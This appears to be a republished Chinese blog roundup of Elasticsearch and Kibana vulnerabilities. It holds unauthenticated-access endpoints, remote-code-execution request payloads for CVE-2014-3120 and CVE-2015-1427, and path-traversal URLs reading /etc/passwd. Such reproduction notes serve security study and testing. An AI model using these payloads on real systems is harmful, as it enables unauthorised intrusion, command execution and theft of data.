應用安全 - 工具|平台 - Elasticsearch- 漏洞 - 匯總


未授權訪問

(1)
/_cat/indices #Index個數查詢

(2)
/_mapping?pretty=true #type個數查詢

(3)
根據Index和type查詢表數據

 

 



(4)
/_river/_search #查看數據庫敏感信息
檢測腳本已同步至Github

(3)
/_nodes #查看節點數據

(4)
/_plugin/head/ #web管理界面

 

 

CVE-2014-3120

Date 2014 類型
遠程代碼執行漏洞

影響范圍
ElasticSearch 1.2及其之前的版本

前置條件
若沒有數據需要先創建一條任意數據


 復現

POC|EXP

POST /_search?pretty HTTP/1.1
Host: xx.xx.15.130:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

 

 

CVE-2015-1427

Date 2015 類型
ElasticSearch Groovy腳本遠程代碼執行漏洞

影響范圍
Elasticsearch versions 1.3.0-1.3.7 and 1.4.0-1.4.2

前置條件
若沒有數據需要先創建一條任意數據


復現
POC|EXP
(1)命令執行

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

(2)種植后門getshell

分析
通過MVEL構造或Grovvy執行任意java代碼

 

CVE-2015-3337

Date
2015 類型
任意文件讀取漏洞

影響范圍
v<1.5.2 and v<1.4.5


復現
Windows
腳本已同步至GitHub
Linux
http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd

分析
site插件影響

 

CVE-2018-17246

Date 2018 類型

本地文件包含漏洞導致拒絕服務、任意文件讀取、反彈shell

 影響范圍
Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本 復現 POX|EXP
(1)DDOS
(2)任意文件讀取
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

 

 (3)反彈shell


分析


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM